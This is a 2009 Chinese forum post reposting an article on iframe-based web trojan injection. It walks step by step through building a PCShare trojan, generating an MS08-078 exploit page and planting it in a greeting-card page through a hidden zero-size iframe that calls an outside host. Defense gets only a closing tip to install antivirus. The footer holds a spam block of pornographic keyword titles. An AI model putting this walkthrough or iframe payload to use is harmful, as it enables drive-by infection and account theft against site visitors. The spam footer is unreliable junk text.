<strike id="quouo"></strike>
<ul id="quouo"><sup id="quouo"></sup></ul>
  • <strike id="quouo"><menu id="quouo"></menu></strike>
    <center id="quouo"><samp id="quouo"></samp></center>
    企業培訓
    首頁 地區推薦 清華EDP 企業內訓 公開課 職業培訓 HR資訊 培訓需求 培訓公司 培訓顧問 客戶服務 在線論壇
    當前類別 > 在線論壇
         
    巔峰培訓論壇 > 先進管理經驗[管理培訓資源] >
    你必須先進行登錄 才能發貼,注冊新會員請點這里.
    今日貼數:7971 |主題總數:77203 | 帖子總數:80214 | 會員總數:2538

    最新貼子 |  熱門貼子 |  搜索貼子 
      本版搜索:  
    興邦智庫CEO課程 北京大學總裁班目錄 中國能源電力企業家班 碩士\博士學位項目
    AI機器人 人工智能 低空經濟 礦業總裁班 建筑業總裁班 新能源班 數據資產化 公司治理與資本運營 心理學 領導力 清華教授、能源局領導、知名企業家,培養全球化視野及國際競爭力的創新型能源企業領導者 新加坡大學博士紐約理工大學MBA美國蘇富比藝術管理碩士金融管理碩士
        您是本貼的第 17150 個閱讀者  
      主題:了解IFRAME框架掛馬\相應的防范解決方法 2009/7/15 20:18:42  
       zgzx1
       等級:論壇騎士(三級)
       積分:2408分
       注冊:2009-5-20
       發表:723(419主題貼)
       登錄:1142
    1 
    了解IFRAME框架掛馬\相應的防范解決方法
         了解IFRAME框架掛馬\相應的防范解決方法
        
         注:最近自己網站被iframe框架掛馬在找解決辦法,找的這樣一篇文章:
        
         當前網絡安全最大的危險是什么?很多人都會說是網頁掛馬。沒錯!為了大規模盜號,掛馬的網頁在去年數以千萬計的增長。普通網民知道怎么在電腦中防范網頁掛馬就可以了,從事和想從事與網絡安全相關工作的朋友就要多掌握一些知識,知道網頁掛馬到底是怎么進行的,有哪幾種方式。知己知彼,就會更好地維護網吧、網站等,就會增加自己的安全技能,逐漸成長為一名安全工程師。
           一名優秀的安全工程師,要能獨立負責網站安全、局域網安全、服務器安全等,要了解網頁掛馬有IFRAME框架掛馬、JS文件掛馬、偽裝掛馬、CSS掛馬、ActiveX組件掛馬等方式,這樣才可以有針對性地進行防范,避免網站和服務器等安全威脅。下面,我們來邁出成長為安全工程師的第一步,掌握IFRAME框架掛馬的底細以及相應的防范方法。
        
           什么是IFRAME框架掛馬
        
           網頁掛馬到如今已經發展出許多方法與應用手段,其中IFRAME網頁框架掛馬是最典型的掛馬方式,也是最基本的掛馬方式,可以說沒有IFRAME,網頁木馬中有一多半就無法很好地隱藏,讓用戶在不察覺中受到攻擊。
        
           什么是IFRAME?IFRAME是一個非常普通的HTML語言標記,它主要用來在一個網頁界面中,劃分出左右或者上下的框架,就如同我們電視機的畫中畫效果一樣。圖2中的山寨搜索引擎的界面就是典型的IFRAME的引用。
        
           但是IFRAME功能也被黑客巧妙地利用了,黑客在一些看似正常的網頁中,使用長寬為0的隱藏框架,讓用戶在不知不覺中打開含有漏洞溢出內容的網頁木馬,這種手法就如同在畫中畫電視中打開了一個收費頻道,但是由于收費頻道的畫面尺寸被惡意修改成了0,所以看電視的人并不知道自己已經打開了收費頻道,雖然他并沒有看到,但是事實上收費頻道卻的確在播放,而且會收取用戶的使用費。
        
           IFRAME框架掛馬實戰
        
           下面我們來做個演示,看看IFRAME框架掛馬到底是怎么做的。
        
           第一步:準備一款得心應手的木馬,例如PCShare,這款軟件在設置上非常簡單,易于操作上手。設置好相關服務,最后生成木馬所用的服務控制端。
        
           第二步:使用FTP將木馬上傳到自己的網站空間中,并用記事本記錄下木馬的網絡路徑。然后再用《MS08-078網頁木馬生成器》,生成一個帶有MS08-078漏洞的惡意網頁。找一個正常的新年賀卡網頁,將該網頁保存到自己指定的目錄中,然后使用Web Designer或Dreamweaver網頁編輯軟件對保存的網頁進行調整修改,然后上傳到自己的網站空間中,看圖片等內容是否能夠正常顯示。
        
           第三步:再一次打開修改好的賀卡網頁,使用IFRAME標記語句,將生成好的MS08-078網頁嵌入到賀卡網頁中,嵌入掛馬代碼如下:
         <iframe src=http://www.hrweek.cn/ms08078.html width=0 height=0></iframe>
        
           將這段代碼插入到賀卡網頁之中后,就完成了我們的網頁掛馬操作。瀏覽賀卡網頁的用戶,在看到賀卡頁面之后,也隨之運行了保存在指定位置“http://www.hrweek.cn/ms08078.html”的漏洞溢出頁面,但是由于它的長和寬都為“0”,觀看賀卡網站的用戶不會看到溢出頁面。
        
           提示:對于IFRAME標記這種利用正常HTML語言功能實現隱藏的掛馬方式,目前并沒有好的防范方法,因為它是正常的網頁功能。大家只能夠寄希望于殺毒軟件和防掛馬軟件阻止利用IFRAME標記內嵌的溢出病毒網頁。我們建議在安裝殺毒軟件之后,能夠安裝第三方防掛馬軟件作為補充,例如銳甲、360等。
        
    2009/7/15 20:18:42
    編輯該貼   回復該貼 | 查看 
    1/0 頁 每頁 10 貼 本主題貼數 0   分頁: 轉到
    管理選項:  刪除  | 總置頂  | 置頂  | 精華  | 普通  | 轉移該貼到:
     
    快速回復(必須登陸成功才能發表)
     用戶名:  密碼:
     主  題:* 不能超過50個漢字或者100個字符
    粗體 斜體 下劃線 居中 空格 超級鏈接 插入圖片 插入Flash 飛行的文字 移動的文字
     

     
      
     
    清華大學高級研修班   清華總裁班 能源產業500強項目庫  能源產業總裁班  中央財經大學私募班  能源500強企業生態   核技術聯盟
      有新帖   沒新帖   總置頂   置頂   精華貼   熱貼   普通貼
    本站網絡實名:“顛峰培訓網”“顛峰人力資源網”
    Copyright 2004 All rights reserved     版權所有:巔峰培訓
    地址:海淀區中關村東路95號中國科學院自動化東樓  電話:(010)8243115O
    主站蜘蛛池模板: 亚洲欧美国产精品专区久久| 无码精品人妻一区二区三区免费看| 精品无人区无码乱码毛片国产| 国产国产精品人在线视| 日韩在线精品一二三区| 国产精品亚洲欧美大片在线看 | 蜜臀AV无码国产精品色午夜麻豆| 老司机99精品99| 国产大片91精品免费观看不卡| 日韩精品人妻系列无码专区免费| 亚洲精品国产高清不卡在线| 久久亚洲AV永久无码精品| 国产精品手机在线观看你懂的| 777被窝午夜精品影院| 欧美高清在线精品一区| 国产精品91av| 99re6在线视频精品免费| 国产午夜精品免费一区二区三区| 久久精品国产99久久久| 亚洲AV无码成人网站久久精品大| 宅男宅女精品国产AV天堂| 香蕉国产精品麻豆亚洲欧美日韩精品自拍欧美v国 | 亚洲精品自产拍在线观看动漫 | 97久久精品国产精品青草| 99国产精品一区二区| jizz国产精品网站| 91精品国产高清91久久久久久 | 无码国产精品一区二区免费vr | 国亚洲欧美日韩精品| 精品无码人妻久久久久久| 欧美黑人巨大videos精品| 欧美成人精品网站播放 | 国产精品乱伦| 久久亚洲国产成人精品无码区| 久久久久无码精品| 亚洲国产精品碰碰| 亚洲精品无码不卡在线播HE| 久久综合国产乱子伦精品免费| 久久国产精品99国产精| 国产精品久久永久免费| 3级黄性日本午夜精品|